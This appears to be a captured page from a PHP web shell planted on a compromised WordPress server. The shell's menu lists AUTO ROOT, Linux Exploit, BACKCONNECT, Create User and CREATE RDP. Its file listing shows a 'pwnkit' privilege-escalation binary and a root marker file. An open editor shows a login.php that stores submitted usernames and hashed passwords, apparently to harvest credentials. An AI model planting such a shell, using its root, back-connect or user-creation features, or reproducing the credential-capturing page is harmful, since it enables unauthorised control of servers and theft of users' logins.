Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
index /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
bootstrap.min.css
118.42
KB
-rw-r--r--
cliques.txt
0
B
-rw-r--r--
contador.php
7.54
KB
-rw-r--r--
funcoes.php
4.04
KB
-rw-r--r--
index.php
6.28
KB
-rw-r--r--
login.php
3.16
KB
-rw-r--r--
logo.png
3.92
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
style.css
2.39
KB
-rw-r--r--
unzip.php
401
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.php
<?php session_start(); if(isset($_POST['usuario']) && strlen($_POST['usuario']) > 0 && isset($_POST['senha']) && strlen($_POST['senha']) > 0){ $_SESSION['usuario'] = $_POST['usuario']; $_SESSION['senha'] = md5($_POST['senha']); header("Location: contador.php"); exit(); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Login</title> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; color: #ffff; } body{ font-family: 'Roboto', sans-serif; } /* HTML5 display-role reset for older browsers */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; } table { border-collapse: collapse; border-spacing: 0; } body{ background:#2b2b2b; padding-top: 20px; } form{ width: 300px; margin: 100px auto; border: 1px solid #007acc; padding: 20px; } input{ display: block; width: 100%; margin-bottom: 20px; background: none; border: 1px solid #007acc; padding: 10px; box-sizing: border-box; color: #007acc; } input::placeholder { color:#007acc; opacity: 1; /* Firefox */ } button{ padding: 5px; color: #fff; border: none; background-color: #007acc; width: 100%; font-weight: bold; } </style> </head> <body> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST"> <input type="text" placeholder="Usuário" name="usuario"> <input type="password" placeholder="Senha" name="senha"> <button type="submit">ENTRAR</button> </form> </body> </html>
Close